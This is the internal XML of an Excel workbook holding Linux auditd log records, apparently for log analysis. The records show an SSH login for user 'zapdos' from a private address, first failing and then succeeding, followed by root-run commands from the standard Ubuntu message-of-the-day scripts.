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O:\___SINUB\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{711DCBE0-ECE4-4931-BFD1-CB0F3C94A3DD}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-28920" yWindow="-120" windowWidth="29040" windowHeight="16440" activeTab="2" xr2:uid="{FB8DEA3F-A886-4D50-921B-53EC92EABE9F}"/>
  </bookViews>
  <sheets>
    <sheet name="RAW" sheetId="1" r:id="rId1"/>
    <sheet name="REF" sheetId="2" r:id="rId2"/>
    <sheet name="JS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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="27702" uniqueCount="3226">
  <si>
    <t>type=SYSCALL</t>
  </si>
  <si>
    <t>msg=audit(1584777409.358:863):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55999367f7d0 a1=559993670fa0 a2=5599936806d0 a3=559993645010 items=2 ppid=2092 pid=2204 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=4 comm="ifconfig" exe="/sbin/ifconfig" key="sbin_susp"</t>
  </si>
  <si>
    <t>type=EXECVE</t>
  </si>
  <si>
    <t>argc=1 a0="ifconfig"</t>
  </si>
  <si>
    <t>type=PATH</t>
  </si>
  <si>
    <t>type=PROCTITLE</t>
  </si>
  <si>
    <t>proctitle="ifconfig"</t>
  </si>
  <si>
    <t>msg=audit(1584777421.530:864):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55d60bcba990 a1=55d60bcc2700 a2=55d60bcba9d0 a3=fffffff6 items=2 ppid=1015 pid=2229 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sshd" exe="/usr/sbin/sshd" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="/usr/sbin/sshd" a1="-D" a2="-R"</t>
  </si>
  <si>
    <t>proctitle=2F7573722F7362696E2F73736864002D44002D52</t>
  </si>
  <si>
    <t>msg=audit(1584777433.706:865):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=4 a0=ffffff9c a1=7f377a3722a3 a2=80000 a3=0 items=1 ppid=1015 pid=2229 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sshd" exe="/usr/sbin/sshd" key="etcpasswd"</t>
  </si>
  <si>
    <t>type=USER_AUTH</t>
  </si>
  <si>
    <t>msg=audit(1584777435.714:866):</t>
  </si>
  <si>
    <t>pid=2229 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication acct="zapdos" exe="/usr/sbin/sshd" hostname=192.168.0.102 addr=192.168.0.102 terminal=ssh res=failed'</t>
  </si>
  <si>
    <t>msg=audit(1584777435.714:867):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=4 a0=ffffff9c a1=564976a34370 a2=401 a3=0 items=1 ppid=1015 pid=2229 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sshd" exe="/usr/sbin/sshd" key="session"</t>
  </si>
  <si>
    <t>type=USER_LOGIN</t>
  </si>
  <si>
    <t>msg=audit(1584777435.766:868):</t>
  </si>
  <si>
    <t>pid=2229 uid=0 auid=4294967295 ses=4294967295 msg='op=login acct="zapdos" exe="/usr/sbin/sshd" hostname=? addr=192.168.0.102 terminal=sshd res=failed'</t>
  </si>
  <si>
    <t>msg=audit(1584777448.690:869):</t>
  </si>
  <si>
    <t>msg=audit(1584777450.418:870):</t>
  </si>
  <si>
    <t>msg=audit(1584777450.418:871):</t>
  </si>
  <si>
    <t>msg=audit(1584777450.418:872):</t>
  </si>
  <si>
    <t>msg=audit(1584777455.306:873):</t>
  </si>
  <si>
    <t>msg=audit(1584777455.306:874):</t>
  </si>
  <si>
    <t>pid=2229 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication acct="zapdos" exe="/usr/sbin/sshd" hostname=192.168.0.102 addr=192.168.0.102 terminal=ssh res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777455.306:875):</t>
  </si>
  <si>
    <t>type=USER_ACCT</t>
  </si>
  <si>
    <t>msg=audit(1584777455.306:876):</t>
  </si>
  <si>
    <t>pid=2229 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:accounting acct="zapdos" exe="/usr/sbin/sshd" hostname=192.168.0.102 addr=192.168.0.102 terminal=ssh res=success'</t>
  </si>
  <si>
    <t>type=CRED_ACQ</t>
  </si>
  <si>
    <t>msg=audit(1584777455.306:877):</t>
  </si>
  <si>
    <t>pid=2229 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:setcred acct="zapdos" exe="/usr/sbin/sshd" hostname=192.168.0.102 addr=192.168.0.102 terminal=ssh res=success'</t>
  </si>
  <si>
    <t>type=LOGIN</t>
  </si>
  <si>
    <t>msg=audit(1584777455.306:878):</t>
  </si>
  <si>
    <t>pid=2229 uid=0 old-auid=4294967295 auid=1000 tty=(none) old-ses=4294967295 ses=6 res=1</t>
  </si>
  <si>
    <t>msg=audit(1584777455.318:879):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=133 success=yes exit=0 a0=560ba1a19d80 a1=1180 a2=0 a3=ffffffff items=2 ppid=1 pid=815 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="systemd-logind" exe="/lib/systemd/systemd-logind" key="specialfiles"</t>
  </si>
  <si>
    <t>proctitle="/lib/systemd/systemd-logind"</t>
  </si>
  <si>
    <t>msg=audit(1584777455.326:880):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=7f377c5b2e9a a1=7fff28eb7d00 a2=5649771a0a00 a3=8 items=2 ppid=2229 pid=2299 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="sh" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="sh" a1="-c" a2=2F7573722F62696E2F656E76202D6920504154483D2F7573722F6C6F63616C2F7362696E3A2F7573722F6C6F63616C2F62696E3A2F7573722F7362696E3A2F7573722F62696E3A2F7362696E3A2F62696E2072756E2D7061727473202D2D6C7362737973696E6974202F6574632F7570646174652D6D6F74642E64203E202F72756E2F6D6F74642E64796E616D69632E6E6577</t>
  </si>
  <si>
    <t>proctitle=7368002D63002F7573722F62696E2F656E76202D6920504154483D2F7573722F6C6F63616C2F7362696E3A2F7573722F6C6F63616C2F62696E3A2F7573722F7362696E3A2F7573722F62696E3A2F7362696E3A2F62696E2072756E2D7061727473202D2D6C7362737973696E6974202F6574632F7570646174652D6D6F74642E</t>
  </si>
  <si>
    <t>msg=audit(1584777455.326:881):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55ebe91cfc80 a1=55ebe93db578 a2=55ebe93db5d8 a3=7f1619d5b810 items=2 ppid=2299 pid=2300 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="env" exe="/usr/bin/env" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=6 a0="/usr/bin/env" a1="-i" a2="PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" a3="run-parts" a4="--lsbsysinit" a5="/etc/update-motd.d"</t>
  </si>
  <si>
    <t>proctitle=2F7573722F62696E2F656E76002D6900504154483D2F7573722F6C6F63616C2F7362696E3A2F7573722F6C6F63616C2F62696E3A2F7573722F7362696E3A2F7573722F62696E3A2F7362696E3A2F62696E0072756E2D7061727473002D2D6C7362737973696E6974002F6574632F7570646174652D6D6F74642E64</t>
  </si>
  <si>
    <t>msg=audit(1584777455.362:882):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=no exit=-2 a0=7ffe716f6bf0 a1=7ffe716f6e20 a2=5653b5d64400 a3=7f1a47a771c0 items=1 ppid=2299 pid=2300 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="env" exe="/usr/bin/env" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584777455.362:883):</t>
  </si>
  <si>
    <t>msg=audit(1584777455.362:884):</t>
  </si>
  <si>
    <t>msg=audit(1584777455.362:885):</t>
  </si>
  <si>
    <t>msg=audit(1584777455.362:886):</t>
  </si>
  <si>
    <t>msg=audit(1584777455.362:887):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=7ffe716f6bf0 a1=7ffe716f6e20 a2=5653b5d64400 a3=7f1a47a771c0 items=2 ppid=2299 pid=2300 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="run-parts" exe="/bin/run-parts" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="run-parts" a1="--lsbsysinit" a2="/etc/update-motd.d"</t>
  </si>
  <si>
    <t>msg=audit(1584777455.410:888):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55c161762d00 a1=55c16175e260 a2=7ffe6e1f8208 a3=8 items=3 ppid=2300 pid=2301 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="00-header" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/bin/sh" a1="/etc/update-motd.d/00-header"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F6574632F7570646174652D6D6F74642E642F30302D686561646572</t>
  </si>
  <si>
    <t>msg=audit(1584777455.430:889):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5628219444f0 a1=5628219444c0 a2=5628219444d8 a3=562821944010 items=2 ppid=2301 pid=2302 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="uname" exe="/bin/uname" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="uname" a1="-o"</t>
  </si>
  <si>
    <t>proctitle=756E616D65002D6F</t>
  </si>
  <si>
    <t>msg=audit(1584777455.434:890):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=562821944510 a1=5628219444e0 a2=5628219444f8 a3=562821944010 items=2 ppid=2301 pid=2303 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="uname" exe="/bin/uname" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="uname" a1="-r"</t>
  </si>
  <si>
    <t>proctitle=756E616D65002D72</t>
  </si>
  <si>
    <t>msg=audit(1584777455.434:891):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5628219446e8 a1=562821944508 a2=562821944520 a3=562821944010 items=2 ppid=2301 pid=2304 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="uname" exe="/bin/uname" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="uname" a1="-m"</t>
  </si>
  <si>
    <t>proctitle=756E616D65002D6D</t>
  </si>
  <si>
    <t>msg=audit(1584777455.434:892):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55c161762d00 a1=55c16175e260 a2=7ffe6e1f8208 a3=8 items=3 ppid=2300 pid=2305 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="10-help-text" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/bin/sh" a1="/etc/update-motd.d/10-help-text"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F6574632F7570646174652D6D6F74642E642F31302D68656C702D74657874</t>
  </si>
  <si>
    <t>msg=audit(1584777455.438:893):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55c161762d00 a1=55c16175e260 a2=7ffe6e1f8208 a3=8 items=3 ppid=2300 pid=2306 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="50-motd-news" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/bin/sh" a1="/etc/update-motd.d/50-motd-news"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F6574632F7570646174652D6D6F74642E642F35302D6D6F74642D6E657773</t>
  </si>
  <si>
    <t>msg=audit(1584777455.454:894):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55f120b4fa78 a1=55f120b4fa40 a2=55f120b4fa60 a3=55f120b4f010 items=2 ppid=2306 pid=2310 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="cut" exe="/usr/bin/cut" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="cut" a1="-c" a2="-80"</t>
  </si>
  <si>
    <t>proctitle=637574002D63002D3830</t>
  </si>
  <si>
    <t>msg=audit(1584777455.454:895):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55f120b4fa98 a1=55f120b4fa60 a2=55f120b4fa80 a3=55f120b4f010 items=2 ppid=2306 pid=2309 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="tr" exe="/usr/bin/tr" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="tr" a1="-d" a2="\000-\011\013\014\016-\037"</t>
  </si>
  <si>
    <t>proctitle=7472002D64005C3030302D5C3031315C3031335C3031345C3031362D5C303337</t>
  </si>
  <si>
    <t>msg=audit(1584777455.454:896):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55f120b4fa78 a1=55f120b4fa40 a2=55f120b4fa60 a3=55f120b4f010 items=2 ppid=2306 pid=2308 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="head" exe="/usr/bin/head" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="head" a1="-n" a2="10"</t>
  </si>
  <si>
    <t>proctitle=68656164002D6E003130</t>
  </si>
  <si>
    <t>msg=audit(1584777455.454:897):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55f120b4fa70 a1=55f120b4fa40 a2=55f120b4fa58 a3=55f11f3a7962 items=2 ppid=2306 pid=2307 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="cat" exe="/bin/cat" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="cat" a1="/var/cache/motd-news"</t>
  </si>
  <si>
    <t>proctitle=636174002F7661722F63616368652F6D6F74642D6E657773</t>
  </si>
  <si>
    <t>msg=audit(1584777455.518:898):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55c161762d00 a1=55c16175e260 a2=7ffe6e1f8208 a3=8 items=3 ppid=2300 pid=2311 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="80-esm" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/bin/sh" a1="/etc/update-motd.d/80-esm"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F6574632F7570646174652D6D6F74642E642F38302D65736D</t>
  </si>
  <si>
    <t>msg=audit(1584777455.522:899):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=558eeae93c08 a1=558eeae93bd8 a2=558eeae93bf0 a3=558eeb216010 items=3 ppid=2311 pid=2312 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="lsb_release" exe="/usr/bin/python3.6" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="/usr/bin/python3" a1="-Es" a2="/usr/bin/lsb_release" a3="-cs"</t>
  </si>
  <si>
    <t>proctitle=2F7573722F62696E2F707974686F6E33002D4573002F7573722F62696E2F6C73625F72656C65617365002D6373</t>
  </si>
  <si>
    <t>msg=audit(1584777455.834:900):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=558eeae93c10 a1=558eeae93be0 a2=558eeae93bf8 a3=558eeb216010 items=3 ppid=2311 pid=2313 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="lsb_release" exe="/usr/bin/python3.6" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="/usr/bin/python3" a1="-Es" a2="/usr/bin/lsb_release" a3="-ds"</t>
  </si>
  <si>
    <t>proctitle=2F7573722F62696E2F707974686F6E33002D4573002F7573722F62696E2F6C73625F72656C65617365002D6473</t>
  </si>
  <si>
    <t>msg=audit(1584777455.878:901):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55c161762d00 a1=55c16175e260 a2=7ffe6e1f8208 a3=8 items=3 ppid=2300 pid=2314 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="80-livepatch" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/bin/sh" a1="/etc/update-motd.d/80-livepatch"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F6574632F7570646174652D6D6F74642E642F38302D6C6976657061746368</t>
  </si>
  <si>
    <t>msg=audit(1584777455.910:902):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5643ca880c58 a1=5643ca880c28 a2=5643ca880c40 a3=5643ca678962 items=2 ppid=2314 pid=2315 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="cat" exe="/bin/cat" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="cat" a1="/var/cache/ubuntu-advantage-tools/ubuntu-advantage-status.cache"</t>
  </si>
  <si>
    <t>proctitle=636174002F7661722F63616368652F7562756E74752D616476616E746167652D746F6F6C732F7562756E74752D616476616E746167652D7374617475732E6361636865</t>
  </si>
  <si>
    <t>msg=audit(1584777455.922:903):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5643cc25f4a0 a1=5643cc25f470 a2=5643cc25f488 a3=5643ca678962 items=2 ppid=2316 pid=2318 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="grep" exe="/bin/grep" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="grep" a1="^livepatch"</t>
  </si>
  <si>
    <t>proctitle=67726570005E6C6976657061746368</t>
  </si>
  <si>
    <t>msg=audit(1584777455.938:904):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5643cc25f598 a1=5643cc25f568 a2=5643cc25f580 a3=5643ca678962 items=2 ppid=2319 pid=2321 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="grep" exe="/bin/grep" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="grep" a1="^livepatch:"</t>
  </si>
  <si>
    <t>proctitle=67726570005E6C69766570617463683A</t>
  </si>
  <si>
    <t>msg=audit(1584777455.938:905):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5643cc25f618 a1=5643cc25f5d8 a2=5643cc25f600 a3=0 items=2 ppid=2319 pid=2322 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="sed" exe="/bin/sed" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="sed" a1="-r" a2="-n" a3=732C5E6C69766570617463683A20282E2A29242C5C312C70</t>
  </si>
  <si>
    <t>proctitle=736564002D72002D6E00732C5E6C69766570617463683A20282E2A29242C5C312C70</t>
  </si>
  <si>
    <t>msg=audit(1584777455.954:906):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5643cc25f5e8 a1=5643cc25f5a8 a2=5643cc25f5d0 a3=0 items=2 ppid=2323 pid=2325 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="sed" exe="/bin/sed" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="sed" a1="-r" a2="-n" a3=2F5E6C69766570617463683A2F2C2F5E5C532F732C5E5B5B3A626C616E6B3A5D5D2B706174636853746174653A20282E2A29242C5C312C70</t>
  </si>
  <si>
    <t>proctitle=736564002D72002D6E002F5E6C69766570617463683A2F2C2F5E5C532F732C5E5B5B3A626C616E6B3A5D5D2B706174636853746174653A20282E2A29242C5C312C70</t>
  </si>
  <si>
    <t>msg=audit(1584777455.958:907):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5643cc25f5e8 a1=5643cc25f5a8 a2=5643cc25f5d0 a3=0 items=2 ppid=2326 pid=2328 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="sed" exe="/bin/sed" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="sed" a1="-r" a2="-n" a3=2F5E6C69766570617463683A2F2C2F5E5C532F732C5E5B5B3A626C616E6B3A5D5D2B636865636B53746174653A20282E2A29242C5C312C70</t>
  </si>
  <si>
    <t>proctitle=736564002D72002D6E002F5E6C69766570617463683A2F2C2F5E5C532F732C5E5B5B3A626C616E6B3A5D5D2B636865636B53746174653A20282E2A29242C5C312C70</t>
  </si>
  <si>
    <t>msg=audit(1584777455.958:908):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55c161762d00 a1=55c16175e260 a2=7ffe6e1f8208 a3=8 items=3 ppid=2300 pid=2329 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="90-updates-avai" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/bin/sh" a1="/etc/update-motd.d/90-updates-available"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F6574632F7570646174652D6D6F74642E642F39302D757064617465732D617661696C61626C65</t>
  </si>
  <si>
    <t>msg=audit(1584777455.962:909):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5573ed35a420 a1=5573ed35a3f0 a2=5573ed35a408 a3=7fe518c4c810 items=2 ppid=2329 pid=2330 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="cat" exe="/bin/cat" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="cat" a1="/var/lib/update-notifier/updates-available"</t>
  </si>
  <si>
    <t>proctitle=636174002F7661722F6C69622F7570646174652D6E6F7469666965722F757064617465732D617661696C61626C65</t>
  </si>
  <si>
    <t>msg=audit(1584777455.986:910):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55c161762d00 a1=55c16175e260 a2=7ffe6e1f8208 a3=8 items=3 ppid=2300 pid=2331 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="91-release-upgr" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/bin/sh" a1="/etc/update-motd.d/91-release-upgrade"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F6574632F7570646174652D6D6F74642E642F39312D72656C656173652D75706772616465</t>
  </si>
  <si>
    <t>msg=audit(1584777455.986:911):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=56420ff454e0 a1=56420ff454a8 a2=56420ff454c8 a3=56420ff45010 items=2 ppid=2332 pid=2334 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="cut" exe="/usr/bin/cut" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="cut" a1=2D6420 a2="-f4"</t>
  </si>
  <si>
    <t>proctitle=637574002D6420002D6634</t>
  </si>
  <si>
    <t>msg=audit(1584777455.986:912):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=56420ff454c8 a1=56420ff45498 a2=56420ff454b0 a3=56420ff45010 items=3 ppid=2332 pid=2333 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="lsb_release" exe="/usr/bin/python3.6" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="/usr/bin/python3" a1="-Es" a2="/usr/bin/lsb_release" a3="-sd"</t>
  </si>
  <si>
    <t>proctitle=2F7573722F62696E2F707974686F6E33002D4573002F7573722F62696E2F6C73625F72656C65617365002D7364</t>
  </si>
  <si>
    <t>msg=audit(1584777456.030:913):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=56420ff45328 a1=56420ff45380 a2=56420ff45390 a3=56420ff45010 items=3 ppid=2300 pid=2331 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="release-upgrade" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="/bin/sh" a1="-e" a2="/usr/lib/ubuntu-release-upgrader/release-upgrade-motd"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.074:914):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=564936d39d50 a1=564936d39d20 a2=564936d39d38 a3=564936d39010 items=2 ppid=2331 pid=2335 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="date" exe="/bin/date" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="date" a1="+%s"</t>
  </si>
  <si>
    <t>proctitle=64617465002B2573</t>
  </si>
  <si>
    <t>msg=audit(1584777456.094:915):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=564936d39df0 a1=564936d39db0 a2=564936d39dd8 a3=56493662f962 items=2 ppid=2331 pid=2336 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="stat" exe="/usr/bin/stat" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="stat" a1="-c" a2="%Y" a3="/var/lib/ubuntu-release-upgrader/release-upgrade-available"</t>
  </si>
  <si>
    <t>proctitle=73746174002D63002559002F7661722F6C69622F7562756E74752D72656C656173652D75706772616465722F72656C656173652D757067726164652D617661696C61626C65</t>
  </si>
  <si>
    <t>msg=audit(1584777456.118:916):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=564936d39da0 a1=564936d39d60 a2=564936d39d88 a3=56493662f962 items=2 ppid=2331 pid=2337 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="expr" exe="/usr/bin/expr" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="expr" a1="1584753465" a2="+" a3="86400"</t>
  </si>
  <si>
    <t>proctitle=657870720031353834373533343635002B003836343030</t>
  </si>
  <si>
    <t>msg=audit(1584777456.134:917):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55c161762d00 a1=55c16175e260 a2=7ffe6e1f8208 a3=8 items=3 ppid=2300 pid=2338 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="95-hwe-eol" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/bin/sh" a1="/etc/update-motd.d/95-hwe-eol"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F6574632F7570646174652D6D6F74642E642F39352D6877652D656F6C</t>
  </si>
  <si>
    <t>msg=audit(1584777456.134:918):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55d2de1a2348 a1=55d2de1a2398 a2=55d2de1a23a8 a3=55d2de1a2010 items=3 ppid=2300 pid=2338 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="update-motd-hwe" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="/bin/sh" a1="-e" a2="/usr/lib/update-notifier/update-motd-hwe-eol"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.154:919):</t>
  </si>
  <si>
